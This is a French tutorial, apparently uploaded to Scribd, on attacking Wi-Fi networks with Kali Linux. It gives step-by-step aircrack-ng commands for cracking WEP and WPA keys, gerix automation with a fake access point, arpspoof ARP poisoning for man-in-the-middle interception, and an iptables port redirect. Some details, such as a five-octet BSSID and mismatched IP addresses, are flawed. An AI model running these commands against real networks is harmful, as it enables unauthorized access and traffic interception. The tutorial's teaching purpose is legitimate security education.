0% ont trouvé ce document utile (0 vote)
89 vues7 pages

Attaques de Réseaux Sans

Le document traite des attaques sur les réseaux sans-fil en utilisant Kali Linux, en se concentrant sur des techniques telles que le crackage de réseaux WEP et WPA/WPA2, l'automatisation du processus de crackage, la manipulation de trafic URL et la redirection de port. Il décrit les outils et commandes nécessaires pour réaliser ces attaques tout en soulignant l'importance de sécuriser les réseaux sans-fil. L'objectif est d'éduquer sur les vulnérabilités des réseaux sans-fil plutôt que d'inciter à des activités malveillantes.

Transféré par

francoiskoudoro7
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats ODT, PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
89 vues7 pages

Attaques de Réseaux Sans

Le document traite des attaques sur les réseaux sans-fil en utilisant Kali Linux, en se concentrant sur des techniques telles que le crackage de réseaux WEP et WPA/WPA2, l'automatisation du processus de crackage, la manipulation de trafic URL et la redirection de port. Il décrit les outils et commandes nécessaires pour réaliser ces attaques tout en soulignant l'importance de sécuriser les réseaux sans-fil. L'objectif est d'éduquer sur les vulnérabilités des réseaux sans-fil plutôt que d'inciter à des activités malveillantes.

Transféré par

francoiskoudoro7
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats ODT, PDF, TXT ou lisez en ligne sur Scribd

Attaques de réseaux sans-fil avec

Kali Linux
Aujourd'hui, il n’est pas une entreprise n’utilisant pas les réseaux sans-fil pour
adresser les applications fournies aux utilisateurs. Malheureusement, la
mobilité engendre également un certain nombre d’inconvénient, dont la
sécurité doit tenir compte. Nous allons donc explorer différentes
techniques permettant de manipuler les ondes radio du trafic réseau
incluant celles des téléphones mobiles et des réseaux sans-fil.
Parmi les différentes solutions pour éprouver une connexion au réseau sans-
fil, on détaillera les suivantes :

 Crackage de réseau sans-fil WEP (ainsi que WPA/WPA2)


 Automatisation du crackage des réseaux sans-fil
 Manipulation du trafic d’url
 Redirection de port
L'objectif n'est pas de vous inciter à pirater le réseau sans-fil de
votre voisin, mais plutôt de vous faire prendre conscience de
l'importance de renforcer la sécurisé de son réseau sans-fil (ou
filaire...).
Sommaire [-]
 A. Crackage de réseau sans fil
 B. Automatisation du processus de crackage WiFi
 C. Manipulation de trafic URL
 D. Redirection de port

A. Crackage de réseau sans fil


Il faut commencer par distinguer les réseaux type WEP
(Wireless Equivalent Privacy) de ceux abrégé en WPA
(WiFi Protected Access). Dans le premier cas, il s’agit de la première
génération de réseau sans-fil supplantée en 2003 par la seconde génération
WPA/WPA2.
Dans tous les cas, nous utiliserons Aircrack qui est un programme de capture,
d’analyse et de crackage du trafic de réseaux sans-fil. Grâce au
programme airmon-ng, on va stopper l’interface sans-fil (généralement
appelée wlan0) afin de changer l’adresse MAC :
# airmon-ng stop

# ifconfig wlan0 down

# macchanger --mac 0a:0b:1c:45:56:67 wlan0

On peut alors redémarrer l’interface du Réseau sans-fil:

# airmon-ng start wlan0

Le programme airodump-ng va alors permettre de détecter les points d’accès


au réseau sans-fil à proximité :
# airodump-ng wlan0
Cela permet alors de faire apparaître une liste de réseaux disponibles.
Lorsque l’on affiche celui que l’on souhaite attaquer, on peut arrêter le
déroulement de la liste (en cliquant sur [CTRL]+C. On doit ensuite
sélectionner l’adresse Mac correspondant au réseau souhaité, grâce à ce qui
apparaît dans la colonne BSSID. En cliquant à droite sur le bouton de la souris
et en sélectionnant l’option ‘Copy’, cela permet de mémoriser cette
information.
D'autre part, il faut également retenir le numéro de canal que l’on visualise
dans la colonne ‘Channel’. On peut donc déclencher la capture de la session
pour ce réseau précis :
# airodump-ng -c 10 -w wirelessattack --bssid 09:AC:90:AB:78 wlan0

Cela déclenche l’ouverture d’une fenêtre de type terminal qui affiche le


résultat de la précédente commande. On peut fermer cette fenêtre et en
ouvrir une nouvelle afin de pouvoir tenter l’association grâce au
programme aireplay-ng dont le formalisme est :
# aireplay-ng -1 0 -a <BSSID> -h <MAC> -e <ESSID> <Interface>

Exemple : pour une machine dont le BSSID est 09:AC:90:AB:78 :


# aireplay-ng -1 0 -a 09:AC:90:AB:78 –h 0a:0b:1c:45:56:67 -e sr-kali2018 wlan0

L’étape suivante consiste alors à rediriger le trafic vers le routeur afin de


pouvoir disposer de paquets à capturer. On se sert encore une fois du
programme aireplay-ng pour cette tâche spécifique :
# aireplay-ng -3 -b 09:AC:90:AB:78 -h 0a:0b:1c:45:56:67 wlan0

L’écran de la fenêtre se remplit alors de caractères issus du trafic


Réseau circulant actuellement sur le réseau sans-fil. On peut le laisser
tourner une à deux minutes afin d’avoir assez d’information à exécuter lors
de la phase de crackage. Finalement, on peut exécuter le
programme aircrack-ng pour permettre d’effectuer le décodage de la clé WEP
:
# aircrack-ng -b 09:AC:90:AB:78 wirelessattack.cap

REMARQUE : pour ce qui est du décodage des clés WPA/WPA2, c’est dans la
dernière partie que cela diffère des clés WEP. Une seule commande aireplay-
ng est nécessaire à effectuer l’association :
# aireplay-ng --deauth 1 -a 09:AC:90:AB:78 -c 0a:0b:1c:45:56:67 wlan0

Le décodage peut être récupéré via la commande suivante:

# aircrack-ng -w ./wordlist.lst wirelessattack.cap

B. Automatisation du processus de
crackage WiFi
Afin de permettre une analyse automatique des flux WiFi et détecter les
possibilités de se connecter à distance, on peut mettre en place
l’utilitaire gerix. Pour se faire, on doit le télécharger et le configurer :
# wget https://github.com/kimocoder/gerix-wifi-cracker.git
# unzip gerix-wifi-cracker-master.zip

# mv gerix-wifi-cracker-master/ /usr/share/gerix-wifi-cracker

# cd /usr/share/gerix-wifi-cracker

# python gerix.py

Cela va permettre d’ouvrir une fenêtre applicative disposant d’onglets


permettant d’interagir avec les flux réseaux WiFi :

REMARQUE : comme cela fait appel à une application graphique, il est


conseillé de lancer ce processus depuis un serveur X Window pour pouvoir
afficher correctement la boite de dialogue sans message d’erreur.
En termes de configuration, nous pouvons alors sélectionner l’interface WiFi à
scanner, puis cliquer sur le bouton ‘Enable/Disable Monitor Mode’. Lorsque
l’activation est effective, on peut alors sélectionner le réseau cible et cliquer
sur le bouton ‘Rescan Networks’ :
Cela permet alors de visualiser une liste de réseaux disponibles en tant que
cible de notre opération de scan. On doit sélectionner un réseau chiffré WEP
et se positionner sur l’onglet éponyme où il sera possible de déclencher alors
la capture du trafic :

Il faut ensuite sélectionner l’onglet ‘WEP Attacks (no client)’ afin de


déclencher l’authentification falsifiée sur la victime du faux point d’accès :
On peut alors successivement cliquer sur les boutons ‘Start false access point
authentication on victim’ puis sur celui mentionnant ‘Start the ChopChop
attack’. Dans le terminal qui s’initialise on peut répondre ‘Y’ à la question
‘Use this packet’. Lorsque c’est fait on copie le fichier .cap de capture et on
clique sur le bouton ‘Create the ARP packet to be injected on the victim
access point’.
Lorsque l’on a capturé approximativement 20000 paquets, on peut basculer
sur l’onglet ‘Cracking’ et cliquer sur le bouton ci-dessous pour récupérer le
déchiffrement de la chaîne de caractères associés au mot de passe WEP.

REMARQUE : l’outil gerix permet également de définir un faux point


d’accès. Il existe un onglet ‘Fake AP’ permettant de réaliser ce genre de
paramétrage.

C. Manipulation de trafic URL


Il s’agit ici de réaliser quelque chose d’assez similaire à une attaque de
l’homme du milieu. En effet, on cherche alors à rediriger le trafic destiné à
Internet à passer systématiquement par notre plateforme en premier. Ce
genre de manipulation s’appuie sur une attaque par empoisonnement ARP.
En envoyant des messages ARP spoofé à une victime se trouvant sur le même
réseau local. Cela peut être mené à bien grâce à l’utilitaire arpspoof.
On va donc ouvrir une fenêtre de terminal et exécuter la commande ci-
dessous autorisant la redirection du trafic sur notre machine :

# echo 1 >> /proc/sys/net/ipv4/ip_forward

L’étape suivante consiste à exécuter arpspoof pour empoisonner le trafic


entrant de la machine cible vers la passerelle par défaut. Ce programme
possède de nombreuses options dont le formalisme est le suivant :
# arpspoof -i <Iface> -t <IPtarget> <IPdest>

Donc, si l’on souhaite empoisonner le trafic d’une machine Windows7 (par


exemple), portant l’adresse IP 192.168.5.11, on devra exécuter en premier
lieu la commande suivante :

# arpspoof -i wlan0 -t 192.168.5.11 192.168.1.1

Puis, il faut alors exécuter à nouveau arpspoof pour récupérer le trafic de la


machine servant de passerelle par défaut vers notre plateforme Kali Linux :
# arpspoof -i wlan0 -t 192.168.1.1 192.168.5.5

D. Redirection de port
Maintenant, on peut aussi utiliser Kali Linux pour faire en sorte de rediriger un
port d’écoute spécifique. Typiquement, c’est ce qui se fait par exemple pour
les flux HTTP, sur le port TCP/80, que l’on redirige, le plus souvent, vers le
port TCP/8080.
De la même façon que précédemment, on utilise la fonctionnalité de
redirection ip_forward pour permettre la redirection du trafic de notre
machine :

# echo 1 >> /proc/sys/net/ipv4/ip_forward

Puis, nous exécutons la commande arpspoof pour empoisonner le trafic ARP


(de la même manière que précédemment), mais e ne précisant que l’adresse
IP de destination :

# arpspoof -i wlan0 192.168.1.1

Ensuite, nous exécutons arpspoof pour rediriger le trafic de la passerelle par


défaut vers notre plateforme Kali Linux, en ayant également mis en place une
règle de redirection via iptables :

# arpspoof -i wlan0 -t 192.168.1.1 192.168.5.5

La règle iptables à activer est alors la suivante :


# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
REMARQUE: il ne faut pas oublier que l’on peut également analyser le trafic
réseau au travers de l’outil ettercap que l’on a vu précédemment, lors de la
description des attaques type Man-in-the-middle et qui s’applique également
aux réseaux sans-fil.

Vous aimerez peut-être aussi